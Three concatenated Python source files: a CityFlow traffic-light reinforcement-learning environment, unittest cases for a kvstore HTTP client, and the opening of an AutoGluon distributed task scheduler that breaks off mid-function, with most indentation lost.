def __init__(self, path_to_log, path_to_work_directory, dic_traffic_env_conf):
self.path_to_log = path_to_log
self.path_to_work_directory = path_to_work_directory
self.dic_traffic_env_conf = dic_traffic_env_conf
self.simulator_type = self.dic_traffic_env_conf["SIMULATOR_TYPE"]
self.list_intersection = None
self.list_inter_log = None
self.list_lanes = None
self.system_states = None
self.feature_name_for_neighbor = self._reduce_duplicates(self.dic_traffic_env_conf["LIST_STATE_FEATURE"])
# check min action time
if self.dic_traffic_env_conf["MIN_ACTION_TIME"] <= self.dic_traffic_env_conf["YELLOW_TIME"]:
print("MIN_ACTION_TIME should include YELLOW_TIME")
pass
# raise ValueError
# touch new inter_{}.pkl (if exists, remove)
for inter_ind in range(self.dic_traffic_env_conf["NUM_INTERSECTIONS"]):
path_to_log_file = os.path.join(self.path_to_log, "inter_{0}.pkl".format(inter_ind))
f = open(path_to_log_file, "wb")
f.close()
def reset(self):
# self.eng.reset() to be implemented
# self.eng = engine.Engine(self.dic_traffic_env_conf["INTERVAL"],
# self.dic_traffic_env_conf["THREADNUM"],
# self.dic_traffic_env_conf["SAVEREPLAY"],
# self.dic_traffic_env_conf["RLTRAFFICLIGHT"],
# False,
# 0)
# self.load_roadnet(self.dic_traffic_env_conf["ROADNET_FILE"])
# self.load_flow(self.dic_traffic_env_conf["TRAFFIC_FILE"])
get_cityflow_config(self.dic_traffic_env_conf["INTERVAL"],
0,
self.path_to_work_directory+'/',
# "./data/template_lsr/1_6/",
self.dic_traffic_env_conf["ROADNET_FILE"],
self.dic_traffic_env_conf["TRAFFIC_FILE"],
self.dic_traffic_env_conf["RLTRAFFICLIGHT"],
self.dic_traffic_env_conf["SAVEREPLAY"],
'roadnet.json',
'replay.txt')
self.eng = cityflow.Engine("./config/cityflow_config.json", self.dic_traffic_env_conf["THREADNUM"])
# get adjacency
self.traffic_light_node_dict = self._adjacency_extraction()
# initialize intersections (grid)
self.list_intersection = [Intersection((i + 1, j + 1), self.dic_traffic_env_conf, self.eng,
self.traffic_light_node_dict[
"intersection_{0}_{1}".format(i + 1, j + 1)])
for i in range(self.dic_traffic_env_conf["NUM_ROW"])
for j in range(self.dic_traffic_env_conf["NUM_COL"])]
self.list_inter_log = [[] for i in range(self.dic_traffic_env_conf["NUM_ROW"] *
self.dic_traffic_env_conf["NUM_COL"])]
self.id_to_index = {}
count = 0
for i in range(self.dic_traffic_env_conf["NUM_ROW"]):
for j in range(self.dic_traffic_env_conf["NUM_COL"]):
self.id_to_index['intersection_{0}_{1}'.format(i + 1, j + 1)] = count
count += 1
self.list_lanes = []
for inter in self.list_intersection:
self.list_lanes += inter.list_lanes
self.list_lanes = np.unique(self.list_lanes).tolist()
# print(self.list_lanes)
# get new measurements
system_state_start_time = time.time()
if self.dic_traffic_env_conf["FAST_COMPUTE"]:
self.system_states = {"get_lane_vehicles": self.eng.get_lane_vehicles(),
"get_lane_waiting_vehicle_count": self.eng.get_lane_waiting_vehicle_count(),
"get_vehicle_speed": None,
"get_vehicle_distance": None
}
else:
self.system_states = {"get_lane_vehicles": self.eng.get_lane_vehicles(),
"get_lane_waiting_vehicle_count": self.eng.get_lane_waiting_vehicle_count(),
"get_vehicle_speed": None, # self.eng.get_vehicle_speed(),
"get_vehicle_distance": self.eng.get_vehicle_distance(),
# "num_total_veh": np.sum([self.system_states["get_lane_vehicles"][lane] for lane in self.list_lanes])
}
self.system_states["num_total_veh"] = np.sum(
[len(self.system_states["get_lane_vehicles"][lane]) for lane in self.list_lanes])
update_start_time = time.time()
for inter in self.list_intersection:
inter.update_current_measurements_map(self.system_states, self.path_to_log, False)
# print("Update_current_measurements_map time: ", time.time()-update_start_time)
# update neighbor's info
neighbor_start_time = time.time()
if self.dic_traffic_env_conf["NEIGHBOR"]:
for inter in self.list_intersection:
neighbor_inter_ids = inter.neighbor_ENWS
neighbor_inters = []
for neighbor_inter_id in neighbor_inter_ids:
if neighbor_inter_id is not None:
neighbor_inters.append(self.list_intersection[self.id_to_index[neighbor_inter_id]])
else:
neighbor_inters.append(None)
inter.dic_feature = inter.update_neighbor_info(neighbor_inters, deepcopy(inter.dic_feature))
state, done = self.get_state()
return state
def reset_test(self):
get_cityflow_config(self.dic_traffic_env_conf["INTERVAL"],
0,
self.path_to_work_directory+'/',
# "./data/template_lsr/1_6/",
self.dic_traffic_env_conf["ROADNET_FILE"],
self.dic_traffic_env_conf["TRAFFIC_FILE"],
self.dic_traffic_env_conf["RLTRAFFICLIGHT"],
self.dic_traffic_env_conf["SAVEREPLAY"],
'roadnet.json',
'replay.txt')
self.eng = cityflow.Engine("./config/cityflow_config.json", self.dic_traffic_env_conf["THREADNUM"])
# get adjacency
self.traffic_light_node_dict = self._adjacency_extraction()
# initialize intersections (grid)
self.list_intersection = [Intersection((i + 1, j + 1), self.dic_traffic_env_conf, self.eng,
self.traffic_light_node_dict[
"intersection_{0}_{1}".format(i + 1, j + 1)])
for i in range(self.dic_traffic_env_conf["NUM_ROW"])
for j in range(self.dic_traffic_env_conf["NUM_COL"])]
self.list_inter_log = [[] for i in range(self.dic_traffic_env_conf["NUM_ROW"] *
self.dic_traffic_env_conf["NUM_COL"])]
# get lanes list
self.list_lanes = []
for inter in self.list_intersection:
self.list_lanes += inter.list_lanes
self.list_lanes = np.unique(self.list_lanes).tolist()
# get new measurements
system_state_start_time = time.time()
if self.dic_traffic_env_conf["FAST_COMPUTE"]:
self.system_states = {"get_lane_vehicles": self.eng.get_lane_vehicles(),
"get_lane_waiting_vehicle_count": self.eng.get_lane_waiting_vehicle_count(),
"get_vehicle_speed": None,
"get_vehicle_distance": None
}
else:
self.system_states = {"get_lane_vehicles": self.eng.get_lane_vehicles(),
"get_lane_waiting_vehicle_count": self.eng.get_lane_waiting_vehicle_count(),
"get_vehicle_speed": self.eng.get_vehicle_speed(),
"get_vehicle_distance": self.eng.get_vehicle_distance(),
# "num_total_veh": np.sum([self.system_states["get_lane_vehicles"][lane] for lane in self.list_lanes])
}
self.system_states["num_total_veh"] = np.sum(
[len(self.system_states["get_lane_vehicles"][lane]) for lane in self.list_lanes])
update_start_time = time.time()
for inter in self.list_intersection:
inter.update_current_measurements_map(self.system_states, self.path_to_log, False)
# print("Update_current_measurements_map time: ", time.time()-update_start_time)
# update neighbor's info
neighbor_start_time = time.time()
if self.dic_traffic_env_conf["NEIGHBOR"]:
for inter in self.list_intersection:
neighbor_inter_ids = inter.neighbor_ENWS
neighbor_inters = []
for neighbor_inter_id in neighbor_inter_ids:
if neighbor_inter_id is not None:
neighbor_inters.append(self.list_intersection[self.id_to_index[neighbor_inter_id]])
else:
neighbor_inters.append(None)
inter.dic_feature = inter.update_neighbor_info(neighbor_inters, deepcopy(inter.dic_feature))
state, done = self.get_state()
# print(state)
return state
def step(self, action, test_flag):
step_start_time = time.time()
list_action_in_sec = [action]
list_action_in_sec_display = [action]
for i in range(self.dic_traffic_env_conf["MIN_ACTION_TIME"] - 1):
if self.dic_traffic_env_conf["ACTION_PATTERN"] == "switch":
list_action_in_sec.append(np.zeros_like(action).tolist())
elif self.dic_traffic_env_conf["ACTION_PATTERN"] == "set":
list_action_in_sec.append(np.copy(action).tolist())
list_action_in_sec_display.append(np.full_like(action, fill_value=-1).tolist())
average_reward_action_list = [0] * len(action)
for i in range(self.dic_traffic_env_conf["MIN_ACTION_TIME"]):
action_in_sec = list_action_in_sec[i]
action_in_sec_display = list_action_in_sec_display[i]
instant_time = self.get_current_time()
self.current_time = self.get_current_time()
before_action_feature = self.get_feature()
# state = self.get_state()
if self.dic_traffic_env_conf['DEBUG']:
print("time: {0}".format(instant_time))
else:
if i == 0:
print("time: {0}".format(instant_time))
self._inner_step(action_in_sec, test_flag)
# get reward
if self.dic_traffic_env_conf['DEBUG']:
start_time = time.time()
reward = self.get_reward()
if self.dic_traffic_env_conf['DEBUG']:
print("Reward time: {}".format(time.time() - start_time))
for j in range(len(reward)):
average_reward_action_list[j] = (average_reward_action_list[j] * i + reward[j]) / (i + 1)
# log
self.log(cur_time=instant_time, before_action_feature=before_action_feature, action=action_in_sec_display)
next_state, done = self.get_state()
print("Step time: ", time.time() - step_start_time)
return next_state, reward, done, average_reward_action_list
def _inner_step(self, action, test_flag):
# copy current measurements to previous measurements
for inter in self.list_intersection:
inter.update_previous_measurements()
# set signals
# multi_intersection decided by action {inter_id: phase}
for inter_ind, inter in enumerate(self.list_intersection):
inter.set_signal(
action=action[inter_ind],
action_pattern=self.dic_traffic_env_conf["ACTION_PATTERN"],
yellow_time=self.dic_traffic_env_conf["YELLOW_TIME"],
all_red_time=self.dic_traffic_env_conf["ALL_RED_TIME"]
)
# run one step
for i in range(int(1 / self.dic_traffic_env_conf["INTERVAL"])):
self.eng.next_step()
if self.dic_traffic_env_conf['DEBUG']:
start_time = time.time()
system_state_start_time = time.time()
if self.dic_traffic_env_conf["FAST_COMPUTE"] or test_flag:
self.system_states = {"get_lane_vehicles": self.eng.get_lane_vehicles(),
"get_lane_waiting_vehicle_count": self.eng.get_lane_waiting_vehicle_count(),
"get_vehicle_speed": None,
"get_vehicle_distance": None
}
else:
self.system_states = {"get_lane_vehicles": self.eng.get_lane_vehicles(),
"get_lane_waiting_vehicle_count": self.eng.get_lane_waiting_vehicle_count(),
"get_vehicle_speed": None, # self.eng.get_vehicle_speed(),
"get_vehicle_distance": self.eng.get_vehicle_distance()
}
self.system_states["num_total_veh"] = np.sum(
[len(self.system_states["get_lane_vehicles"][lane]) for lane in self.list_lanes])
if self.dic_traffic_env_conf['DEBUG']:
print("Get system state time: {}".format(time.time() - start_time))
# get new measurements
if self.dic_traffic_env_conf['DEBUG']:
start_time = time.time()
update_start_time = time.time()
for inter in self.list_intersection:
inter.update_current_measurements_map(self.system_states, self.path_to_log, test_flag)
# update neighbor's info
if self.dic_traffic_env_conf["NEIGHBOR"]:
for inter in self.list_intersection:
neighbor_inter_ids = inter.neighbor_ENWS
neighbor_inters = []
for neighbor_inter_id in neighbor_inter_ids:
if neighbor_inter_id is not None:
neighbor_inters.append(self.list_intersection[self.id_to_index[neighbor_inter_id]])
else:
neighbor_inters.append(None)
inter.dic_feature = inter.update_neighbor_info(neighbor_inters, deepcopy(inter.dic_feature))
if self.dic_traffic_env_conf['DEBUG']:
print("Update measurements time: {}".format(time.time() - start_time))
# self.log_lane_vehicle_position()
# self.log_first_vehicle()
# self.log_phase()
def load_roadnet(self, roadnetFile=None):
print("Start load roadnet")
start_time = time.time()
if not roadnetFile:
roadnetFile = "roadnet_1_1.json"
self.eng.load_roadnet(os.path.join(self.path_to_work_directory, roadnetFile))
print("successfully load roadnet:{0}, time: {1}".format(roadnetFile, time.time() - start_time))
def load_flow(self, flowFile=None):
print("Start load flowFile")
start_time = time.time()
if not flowFile:
flowFile = "flow_1_1.json"
self.eng.load_flow(os.path.join(self.path_to_work_directory, flowFile))
print("successfully load flowFile: {0}, time: {1}".format(flowFile, time.time() - start_time))
def _check_episode_done(self, list_state):
# ======== to implement ========
return False
@staticmethod
def convert_dic_to_df(dic):
list_df = []
for key in dic:
df = pd.Series(dic[key], name=key)
list_df.append(df)
return pd.DataFrame(list_df)
def get_feature(self):
list_feature = [inter.get_feature() for inter in self.list_intersection]
return list_feature
def get_state(self):
# consider neighbor info
list_state = [inter.get_state(self.dic_traffic_env_conf["LIST_STATE_FEATURE"]) for inter in
self.list_intersection]
done = self._check_episode_done(list_state)
return list_state, done
@staticmethod
def _reduce_duplicates(feature_name_list):
new_list = set()
for feature_name in feature_name_list:
if feature_name[-1] in ["0", "1", "2", "3"]:
new_list.add(feature_name[:-2])
return list(new_list)
def get_reward(self):
list_reward = [inter.get_reward(self.dic_traffic_env_conf["DIC_REWARD_INFO"]) for inter in
self.list_intersection]
return list_reward
def get_current_time(self):
return self.eng.get_current_time()
def log(self, cur_time, before_action_feature, action):
for inter_ind in range(len(self.list_intersection)):
self.list_inter_log[inter_ind].append({"time": cur_time,
"state": before_action_feature[inter_ind],
"action": action[inter_ind]})
def batch_log(self, start, stop):
for inter_ind in range(start, stop):
path_to_log_file = os.path.join(self.path_to_log, "inter_{0}.pkl".format(inter_ind))
f = open(path_to_log_file, "wb")
pickle.dump(self.list_inter_log[inter_ind], f)
f.close()
vol = get_traffic_volume(self.dic_traffic_env_conf["TRAFFIC_FILE"])
self.eng.print_log(os.path.join(self.path_to_log, self.dic_traffic_env_conf["ROADNET_FILE"]),
os.path.join(self.path_to_log, "replay_1_1_%s.txt" % vol))
def bulk_log_multi_process(self, batch_size=100):
assert len(self.list_intersection) == len(self.list_inter_log)
if batch_size > len(self.list_intersection):
batch_size_run = len(self.list_intersection)
else:
batch_size_run = batch_size
process_list = []
for batch in range(0, len(self.list_intersection), batch_size_run):
start = batch
stop = min(batch + batch_size, len(self.list_intersection))
p = Process(target=self.batch_log, args=(start, stop))
print("before")
p.start()
print("end")
process_list.append(p)
print("before join")
for t in process_list:
t.join()
f = open(os.path.join(self.path_to_log, "log_done.txt"), "a")
f.close()
def bulk_log(self):
for inter_ind in range(len(self.list_intersection)):
path_to_log_file = os.path.join(self.path_to_log, "vehicle_inter_{0}.csv".format(inter_ind))
dic_vehicle = self.list_intersection[inter_ind].get_dic_vehicle_arrive_leave_time()
df = self.convert_dic_to_df(dic_vehicle)
df.to_csv(path_to_log_file, na_rep="nan")
for inter_ind in range(len(self.list_inter_log)):
path_to_log_file = os.path.join(self.path_to_log, "inter_{0}.pkl".format(inter_ind))
f = open(path_to_log_file, "wb")
pickle.dump(self.list_inter_log[inter_ind], f)
f.close()
vol = get_traffic_volume(self.dic_traffic_env_conf["TRAFFIC_FILE"])
self.eng.print_log(os.path.join(self.path_to_log, self.dic_traffic_env_conf["ROADNET_FILE"]),
os.path.join(self.path_to_log, "replay_1_1_%s.txt" % vol))
def log_attention(self, attention_dict):
path_to_log_file = os.path.join(self.path_to_log, "attention.pkl")
f = open(path_to_log_file, "wb")
pickle.dump(attention_dict, f)
f.close()
def log_hidden_state(self, hidden_states):
path_to_log_file = os.path.join(self.path_to_log, "hidden_states.pkl")
with open(path_to_log_file, "wb") as f:
pickle.dump(hidden_states, f)
def log_lane_vehicle_position(self):
def list_to_str(alist):
new_str = ""
for s in alist:
new_str = new_str + str(s) + " "
return new_str
dic_lane_map = {
"road_0_1_0_0": "w",
"road_2_1_2_0": "e",
"road_1_0_1_0": "s",
"road_1_2_3_0": "n"
}
for inter in self.list_intersection:
for lane in inter.list_entering_lanes:
print(str(self.get_current_time()) + ", " + lane + ", " + list_to_str(
inter._get_lane_vehicle_position([lane])[0]),
file=open(os.path.join(self.path_to_log, "lane_vehicle_position_%s.txt" % dic_lane_map[lane]),
"a"))
def log_first_vehicle(self):
_veh_id = "flow_0_"
_veh_id_2 = "flow_2_"
_veh_id_3 = "flow_4_"
_veh_id_4 = "flow_6_"
for inter in self.list_intersection:
for i in range(100):
veh_id = _veh_id + str(i)
veh_id_2 = _veh_id_2 + str(i)
pos, speed = inter._get_vehicle_info(veh_id)
pos_2, speed_2 = inter._get_vehicle_info(veh_id_2)
# print(i, veh_id, pos, veh_id_2, speed, pos_2, speed_2)
if not os.path.exists(os.path.join(self.path_to_log, "first_vehicle_info_a")):
os.makedirs(os.path.join(self.path_to_log, "first_vehicle_info_a"))
if not os.path.exists(os.path.join(self.path_to_log, "first_vehicle_info_b")):
os.makedirs(os.path.join(self.path_to_log, "first_vehicle_info_b"))
if pos and speed:
print("%f, %f, %f" % (self.get_current_time(), pos, speed),
file=open(
os.path.join(self.path_to_log, "first_vehicle_info_a", "first_vehicle_info_a_%d.txt" % i),
"a"))
if pos_2 and speed_2:
print("%f, %f, %f" % (self.get_current_time(), pos_2, speed_2),
file=open(
os.path.join(self.path_to_log, "first_vehicle_info_b", "first_vehicle_info_b_%d.txt" % i),
"a"))
veh_id_3 = _veh_id_3 + str(i)
veh_id_4 = _veh_id_4 + str(i)
pos_3, speed_3 = inter._get_vehicle_info(veh_id_3)
pos_4, speed_4 = inter._get_vehicle_info(veh_id_4)
# print(i, veh_id, pos, veh_id_2, speed, pos_2, speed_2)
if not os.path.exists(os.path.join(self.path_to_log, "first_vehicle_info_c")):
os.makedirs(os.path.join(self.path_to_log, "first_vehicle_info_c"))
if not os.path.exists(os.path.join(self.path_to_log, "first_vehicle_info_d")):
os.makedirs(os.path.join(self.path_to_log, "first_vehicle_info_d"))
if pos_3 and speed_3:
print("%f, %f, %f" % (self.get_current_time(), pos_3, speed_3),
file=open(
os.path.join(self.path_to_log, "first_vehicle_info_c", "first_vehicle_info_a_%d.txt" % i),
"a"))
if pos_4 and speed_4:
print("%f, %f, %f" % (self.get_current_time(), pos_4, speed_4),
file=open(
os.path.join(self.path_to_log, "first_vehicle_info_d", "first_vehicle_info_b_%d.txt" % i),
"a"))
def log_phase(self):
for inter in self.list_intersection:
print("%f, %f" % (self.get_current_time(), inter.current_phase_index),
file=open(os.path.join(self.path_to_log, "log_phase.txt"), "a"))
def _adjacency_extraction(self):
traffic_light_node_dict = {}
file = os.path.join(self.path_to_work_directory, self.dic_traffic_env_conf["ROADNET_FILE"])
with open('{0}'.format(file)) as json_data:
net = json.load(json_data)
# print(net)
for inter in net['intersections']:
if not inter['virtual']:
traffic_light_node_dict[inter['id']] = {'location': {'x': float(inter['point']['x']),
'y': float(inter['point']['y'])},
"total_inter_num": None, 'adjacency_row': None,
"inter_id_to_index": None,
"neighbor_ENWS": None}
top_k = self.dic_traffic_env_conf["TOP_K_ADJACENCY"]
total_inter_num = len(traffic_light_node_dict.keys())
inter_id_to_index = {}
edge_id_dict = {}
for road in net['roads']:
if road['id'] not in edge_id_dict.keys():
edge_id_dict[road['id']] = {}
edge_id_dict[road['id']]['from'] = road['startIntersection']
edge_id_dict[road['id']]['to'] = road['endIntersection']
index = 0
for i in traffic_light_node_dict.keys():
inter_id_to_index[i] = index
index += 1
for i in traffic_light_node_dict.keys():
location_1 = traffic_light_node_dict[i]['location']
                row = np.zeros(total_inter_num)  # keep float precision for the pairwise distances
# row = np.zeros((self.dic_traffic_env_conf["NUM_ROW"],self.dic_traffic_env_conf["NUM_col"]))
for j in traffic_light_node_dict.keys():
location_2 = traffic_light_node_dict[j]['location']
dist = AnonEnv._cal_distance(location_1, location_2)
row[inter_id_to_index[j]] = dist
if len(row) == top_k:
adjacency_row_unsorted = np.argpartition(row, -1)[:top_k].tolist()
elif len(row) > top_k:
adjacency_row_unsorted = np.argpartition(row, top_k)[:top_k].tolist()
else:
adjacency_row_unsorted = [k for k in range(total_inter_num)]
adjacency_row_unsorted.remove(inter_id_to_index[i])
traffic_light_node_dict[i]['adjacency_row'] = [inter_id_to_index[i]] + adjacency_row_unsorted
traffic_light_node_dict[i]['total_inter_num'] = total_inter_num
for i in traffic_light_node_dict.keys():
                traffic_light_node_dict[i]['inter_id_to_index'] = inter_id_to_index  # intersection id -> index mapping
traffic_light_node_dict[i]['neighbor_ENWS'] = []
for j in range(4):
road_id = i.replace("intersection", "road") + "_" + str(j)
if edge_id_dict[road_id]['to'] not in traffic_light_node_dict.keys():
traffic_light_node_dict[i]['neighbor_ENWS'].append(None)
else:
traffic_light_node_dict[i]['neighbor_ENWS'].append(edge_id_dict[road_id]['to'])
return traffic_light_node_dict
@staticmethod
def _cal_distance(loc_dict1, loc_dict2):
a = np.array((loc_dict1['x'], loc_dict1['y']))
b = np.array((loc_dict2['x'], loc_dict2['y']))
return np.sqrt(np.sum((a - b) ** 2))
def end_sumo(self):
print("anon process end")
pass
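# A minimal sketch of how _adjacency_extraction() selects the TOP_K_ADJACENCY
# nearest intersections: np.argpartition(row, k)[:k] yields the indices of the
# k smallest distances (in no particular order), and the intersection itself
# (distance 0) is then moved to the front of adjacency_row. The distance values
# below are hypothetical.
def _example_top_k_neighbors(top_k=3):
    import numpy as np
    row = np.array([0.0, 300.0, 100.0, 424.3, 500.0])   # distances from intersection 0
    nearest = np.argpartition(row, top_k)[:top_k].tolist()
    return sorted(nearest)                               # [0, 1, 2]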
if __name__ == '__main__':
pass
inter_and_neighbor_state = {}
inter_state = {"aaa": [122, 1, 2, 3, 3],
"bbb": [122, 1, 2, 3, 3],
"ccc": [122, 1, 2, 3, 3],
"ddd": [122, 1, 2, 3, 3]
}
none_state = deepcopy(inter_state)
for key in none_state.keys():
none_state[key] = [0] * len(none_state[key])
def _add_suffix_to_dict_key(target_dict, suffix):
keys = list(target_dict.keys())
for key in keys:
target_dict[key + "_" + suffix] = target_dict.pop(key)
return target_dict
inter_and_neighbor_state.update(inter_state)
id_to_index = [None, 1, 2, None]
for i in range(4):
if id_to_index[i] is None: # if one's neighbor is None, fill in with zero values
example_value = _add_suffix_to_dict_key(deepcopy(none_state), str(i))
else:
example_value = _add_suffix_to_dict_key(deepcopy(inter_state), str(i))
inter_and_neighbor_state.update(example_value)
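# A minimal sketch of how AnonEnv.step() stretches a single agent decision over
# MIN_ACTION_TIME seconds: with ACTION_PATTERN == "set" the chosen phases are
# repeated every second, with "switch" only the first second carries the action
# and the remaining seconds are zero vectors. The action values are hypothetical.
def _example_expand_action(action, min_action_time, action_pattern):
    import numpy as np
    list_action_in_sec = [list(action)]
    for _ in range(min_action_time - 1):
        if action_pattern == "switch":
            list_action_in_sec.append(np.zeros_like(action).tolist())
        elif action_pattern == "set":
            list_action_in_sec.append(np.copy(action).tolist())
    return list_action_in_sec
# _example_expand_action([1, 3], 3, "set")    -> [[1, 3], [1, 3], [1, 3]]
# _example_expand_action([1, 3], 3, "switch") -> [[1, 3], [0, 0], [0, 0]]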
|
tests.py
|
"""Tests for the kvstore API"""
import unittest
import kvstore
import Queue
import threading
ENDPOINT = 'http://10.112.0.101:8500/v1/kv'
class KVStoreTestCase(unittest.TestCase):
def setUp(self):
self.kv = kvstore.Client(ENDPOINT)
def tearDown(self):
self.kv.delete('__testing__', recursive=True)
def test_set_new_key(self):
key = '__testing__/testsetnew'
value = '123456'
self.kv.set(key, value)
returned = self.kv.get(key)
self.assertEqual(returned, value)
def test_set_new_key_starting_with_slash(self):
key = '/__testing__/testsetnew'
value = '123456'
self.kv.set(key, value)
returned = self.kv.get(key)
self.assertEqual(returned, value)
def test_set_update_key(self):
key = '__testing__/testsetupdate'
value = 'orig'
self.kv.set(key, value)
value = 'new'
self.kv.set(key, value)
returned = self.kv.get(key)
self.assertEqual(returned, value)
def test_set_int_value(self):
key = '__testing__/testsetnew'
value = 1
self.kv.set(key, value)
returned = self.kv.get(key)
self.assertEqual(int(returned), value)
def test_get_existing_key(self):
key = '__testing__/testget'
value = '123456'
self.kv.set(key, value)
returned = self.kv.get(key)
self.assertEqual(returned, value)
def test_get_existing_key_starting_with_slash(self):
key = '/__testing__/testget'
value = '123456'
self.kv.set(key, value)
returned = self.kv.get(key)
self.assertEqual(returned, value)
def test_get_wait_returns_after_timeout_expired(self):
key = '__testing__/testwaittimeout'
expected = '000'
self.kv.set(key, expected)
index = self.kv.index(key)
result = self.kv.get(key, wait=True, wait_index=index, timeout='1s')
self.assertEqual(result, expected)
def test_get_wait_with_index_and_timeout(self):
key = '__testing__/testwait'
initial = '000'
expected = '123'
self.kv.set(key, initial)
index = self.kv.index(key)
def wait_until_key_changes(key, index, timeout, q):
q.put(self.kv.get(key, wait=True, wait_index=index, timeout=timeout))
q = Queue.Queue()
t = threading.Thread(target=wait_until_key_changes, args=(key, index, '5s', q))
t.daemon = True
t.start()
self.kv.set(key, expected)
t.join()
result = q.get()
self.assertEqual(result, expected)
def test_recurse(self):
expected = {'__testing__/r0': 'r0',
'__testing__/r0/r1': 'r1',
'__testing__/r0/r1/r2': 'r2'}
for (k, v) in expected.items():
self.kv.set(k, v)
result = self.kv.recurse('__testing__')
self.assertEqual(result, expected)
def test_recurse_wait_with_index_and_timeout(self):
key = '__testing__'
initial = {'__testing__/r0': '',
'__testing__/r0/r1': '',
'__testing__/r0/r1/r2': ''}
key_updated = '__testing__/r0/r1/r2'
value_updated = 'FINAL'
expected = {'__testing__/r0': '',
'__testing__/r0/r1': '',
key_updated: value_updated}
for (k, v) in initial.items():
self.kv.set(k, v)
index = self.kv.index(key, recursive=True)
def wait_until_key_changes(key, index, timeout, q):
result = self.kv.recurse(key, wait=True, wait_index=index, timeout=timeout)
q.put(result)
q = Queue.Queue()
t = threading.Thread(target=wait_until_key_changes, args=(key, index, '5s', q))
t.daemon = True
t.start()
self.kv.set(key_updated, value_updated)
t.join()
result = q.get()
self.assertEqual(result, expected)
def test_index_increases(self):
key = '__testing__/testindex'
expected = '000'
self.kv.set(key, expected)
        index1 = self.kv.index(key)
        self.kv.set(key, expected)
        index2 = self.kv.index(key)
self.assertGreater(index2, index1)
    def test_delete_existing_key(self):
        key = '__testing__/testdelete'
        value = '123456'
        self.kv.set(key, value)
        self.kv.delete(key)
        self.assertRaises(kvstore.KeyDoesNotExist, self.kv.get, key)
def test_delete_non_existing_key(self):
key = '__testing__/testdelete'
self.kv.delete(key)
self.assertRaises(kvstore.KeyDoesNotExist, self.kv.get, key)
def test_delete_recursive(self):
self.kv.set('__testing__/testdeleterecursive', 'XYZ')
self.kv.set('__testing__/testdeleterecursive/level0', 'XYZ')
self.kv.set('__testing__/testdeleterecursive/level0/level1', 'XYZ')
self.kv.delete('__testing__/testdeleterecursive', recursive=True)
self.assertRaises(kvstore.KeyDoesNotExist, self.kv.get, '__testing__/testdeleterecursive')
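# A minimal sketch of the blocking-watch pattern that the wait tests above
# exercise, outside of unittest: read the current modify index for a key, then
# block on get() until the key changes or the timeout expires. The key name and
# timeout value are assumptions for illustration only.
def _example_watch_key(client, key='__testing__/watchme'):
    index = client.index(key)
    # Returns the (possibly unchanged) value after at most 30 seconds.
    return client.get(key, wait=True, wait_index=index, timeout='30s')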
if __name__ == '__main__':
unittest.main()
|
scheduler.py
|
"""Distributed Task Scheduler"""
import os
import pickle
import logging
import sys
import distributed
from warnings import warn
import multiprocessing as mp
from collections import OrderedDict
from .remote import RemoteManager
from .resource import DistributedResourceManager
from .. import Task
from .reporter import *
from ..utils import AutoGluonWarning, AutoGluonEarlyStop, CustomProcess
logger = logging.getLogger(__name__)
__all__ = ['TaskScheduler']
class ClassProperty(object):
def __init__(self, fget):
self.fget = fget
def __get__(self, owner_self, owner_cls):
return self.fget(owner_cls)
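# A minimal, self-contained sketch of what ClassProperty is used for below:
# TaskScheduler exposes lazily-created, class-wide singletons (resource_manager,
# remote_manager) that are reachable on the class itself without instantiating
# a scheduler first. The demo class and attribute names are hypothetical.
class _ClassPropertyDemo(object):
    _shared = None
    @ClassProperty
    def shared(cls):
        if cls._shared is None:
            cls._shared = object()   # created once, on first access
        return cls._shared
# _ClassPropertyDemo.shared is _ClassPropertyDemo.shared  -> True (same object)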
class TaskScheduler(object):
"""Base Distributed Task Scheduler
"""
LOCK = mp.Lock()
_resource_manager = None
_remote_manager = None
@ClassProperty
def resource_manager(cls):
if cls._resource_manager is None:
cls._resource_manager = DistributedResourceManager()
return cls._resource_manager
@ClassProperty
def remote_manager(cls):
if cls._remote_manager is None:
cls._remote_manager = RemoteManager()
return cls._remote_manager
def __init__(self, dist_ip_addrs=None):
if dist_ip_addrs is None:
dist_ip_addrs=[]
cls = TaskScheduler
remotes = cls.remote_manager.add_remote_nodes(dist_ip_addrs)
cls.resource_manager.add_remote(cls.remote_manager.get_remotes())
self.scheduled_tasks = []
self.finished_tasks = []
def add_remote(self, ip_addrs):
"""Add remote nodes to the scheduler computation resource.
"""
ip_addrs = [ip_addrs] if isinstance(ip_addrs, str) else ip_addrs
with self.LOCK:
remotes = TaskScheduler.remote_manager.add_remote_nodes(ip_addrs)
TaskScheduler.resource_manager.add_remote(remotes)
@classmethod
def upload_files(cls, files, **kwargs):
"""Upload files to remote machines, so that they are accessible by import or load.
"""
cls.remote_manager.upload_files(files, **kwargs)
def _dict_from_task(self, task):
if isinstance(task, Task):
return {'TASK_ID': task.task_id, 'Args': task.args}
else:
assert isinstance(task, dict)
return {'TASK_ID': task['TASK_ID'], 'Args': task['Args']}
def add_task(self, task, **kwargs):
"""add_task() is now deprecated in favor of add_job().
"""
warn("scheduler.add_task() is now deprecated in favor of scheduler.add_job().",
AutoGluonWarning)
self.add_job(task, **kwargs)
def add_job(self, task, **kwargs):
"""Adding a training task to the scheduler.
Args:
task (:class:`autogluon.scheduler.Task`): a new training task
Relevant entries in kwargs:
- bracket: HB bracket to be used. Has been sampled in _promote_config
- new_config: If True, task starts new config eval, otherwise it promotes
a config (only if type == 'promotion')
Only if new_config == False:
- config_key: Internal key for config
- resume_from: config promoted from this milestone
- milestone: config promoted to this milestone (next from resume_from)
"""
# adding the task
cls = TaskScheduler
if not task.resources.is_ready:
cls.resource_manager._request(task.resources)
job = cls._start_distributed_job(task, cls.resource_manager)
new_dict = self._dict_from_task(task)
new_dict['Job'] = job
with self.LOCK:
self.scheduled_tasks.append(new_dict)
def run_job(self, task):
"""Run a training task to the scheduler (Sync).
"""
cls = TaskScheduler
cls.resource_manager._request(task.resources)
job = cls._start_distributed_job(task, cls.resource_manager)
return job.result()
@staticmethod
def _start_distributed_job(task, resource_manager):
"""Async Execute the job in remote and release the resources
"""
logger.debug('\nScheduling {}'.format(task))
job = task.resources.node.submit(TaskScheduler._run_dist_job,
task.fn, task.args, task.resources.gpu_ids)
def _release_resource_callback(fut):
logger.debug('Start Releasing Resource')
resource_manager._release(task.resources)
job.add_done_callback(_release_resource_callback)
return job
@staticmethod
def _run_dist_job(fn, args, gpu_ids):
"""Remote function Executing the task
"""
if '_default_config' in args['args']:
args['args'].pop('_default_config')
if 'reporter' in args:
local_reporter = LocalStatusReporter()
dist_reporter = args['reporter']
args['reporter'] = local_reporter
manager = mp.Manager()
return_list = manager.list()
def _worker(return_list, gpu_ids, args):
"""Worker function in thec client
"""
if len(gpu_ids) > 0:
# handle GPU devices
